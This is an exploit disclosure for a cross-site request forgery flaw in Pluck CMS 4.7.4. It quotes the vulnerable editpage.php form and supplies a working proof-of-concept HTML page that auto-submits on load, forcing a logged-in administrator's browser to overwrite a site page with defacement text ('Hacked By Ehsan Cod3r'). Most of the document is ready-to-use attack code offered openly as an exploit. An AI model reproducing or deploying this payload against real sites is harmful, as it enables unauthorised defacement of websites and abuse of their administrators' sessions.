==============================================
# Exploit Title : pluck-cms vulnerability CSRF
# Reported Date : 8 - 10 - 2017
# Exploit Author : Ashiyane Digital Security Team
# CWE: CSRF - 352
# Tested On : kali Linux
# Vendor Homepage : https://www.pluck-cms.org/
# Software Link : https://github.com/pluck-cms/pluck/releases
# Version : 4.7.4
==============================================
-----------------------------
vulnerability discovered by :
Ehsan Cod3r , Und3rgr0und
-----------------------------
vulnerability Path :
http://127.0.0.1/PluckCMS/data/inc/editpage.php
-----------------------------
vulnerability File:
editpage.php
-----------------------------
vulnerability Method :
_GET[]
-----------------------------
Vulnerability code :
<form name="page_form" method="post" action="">
<p>
<label class="kop2" for="title"><?php echo $lang['general']['title'];
?></label>
<input name="title" id="title" type="text" value="<?php if
(isset($_GET['page'])) echo $title; ?>" />
</p>
<p><a href="#" class="kop2" onclick="return kadabra('seo-name');"><?php
echo $lang['page']['seo_urls']; ?></a></p>
<div id="seo-name" style="display: none;">
<input name="seo_name" id="seo_name" type="text" value="<?php if
(isset($_GET['page'])) if (isset($seoname)) echo $seoname; else echo
$title; ?>" />
</div>
<label class="kop2" for="content-form"><?php echo
$lang['general']['contents']; ?></label>
<textarea class="<?php if (defined('WYSIWYG_TEXTAREA_CLASS')) echo
WYSIWYG_TEXTAREA_CLASS; ?>" name="content" id="content-form" cols="70"
rows="20"><?php if (isset($_GET['page'])) echo htmlspecialchars($content);
?></textarea>
<div class="menudiv" style="width: 588px; margin-<?php if (DIRECTION_RTL)
echo 'right'; else echo 'left'; ?>: 0;">
<p><a href="#" class="kop2" onclick="return kadabra('meta-options');"><?php
echo $lang['editmeta']['title']; ?></a></p>
<p class="kop4" style="margin-bottom: 5px;"><?php echo
$lang['editmeta']['descr']; ?></p>
<div id="meta-options" style="display: none;">
<label for="description"><?php echo $lang['general']['description'];
?></label>
<br />
<textarea id="description" name="description" rows="2" cols="40"
class="white"><?php if (isset($description)) echo $description;
?></textarea>
<br />
<label for="keywords"><?php echo $lang['editmeta']['keywords'];
?></label>
<br />
<span class="kop4"><?php echo $lang['editmeta']['comma']; ?></span>
<br />
<textarea id="keywords" name="keywords" rows="1" cols="40"
class="white"><?php if (isset($keywords)) echo $keywords; ?></textarea>
</div>
</div>
<div class="menudiv" style="width: 588px; margin-<?php if (DIRECTION_RTL)
echo 'right'; else echo 'left'; ?>: 0;">
<p><a href="#" class="kop2" onclick="return
kadabra('other-options');"><?php echo $lang['general']['other_options'];
?></a></p>
<p class="kop4" style="margin-bottom: 5px;"><?php echo
$lang['page']['options']; ?></p>
<div id="other-options" style="display: block;">
<table>
<tr>
<td><label for="hidden"><?php echo $lang['page']['in_menu'];
?></label><br /></td>
<td><input type="checkbox" name="hidden" id="hidden" <?php if
(!isset($_GET['page']) || $hidden == 'no') echo'checked="checked"'; ?>
value="no" /></td>
</tr>
<tr>
<td><label for="sub_page"><?php echo $lang['page']['sub_page'];
?></label></td>
<td> <?php if (isset($_GET['page']))
show_subpage_select('sub_page', $_GET['page']); else
show_subpage_select('sub_page'); ?></td>
</tr>
<?php run_hook('admin_save_page_beforepost'); ?>
</table>
</div>
</div>
<?php show_common_submits('?action=page', true); ?>
</form>
============================================================================
Exploit code :
<html>
<body onload="document.exploit.submit()">
<form name="exploit" method="post" action="
http://localhost/1/PluckCMS/admin.php?action=editpage">
<input type="hidden" name="title" value="Hacked By Ehsan Cod3r">
<input type="hidden" name="seo_name" value="">
<input type="hidden" name="content" value="<h1>Hacked By Ehsan Cod3r">
<input type="hidden" name="description" value="">
<input type="hidden" name="keywords" value="">
<input type="hidden" name="hidden" value="no">
<input type="hidden" name="sub_page" value="">
<input type="hidden" name="theme" value="default">
<input type="hidden" name="save_exit" value="Save+and+Exit">
</form>
</body>
</html>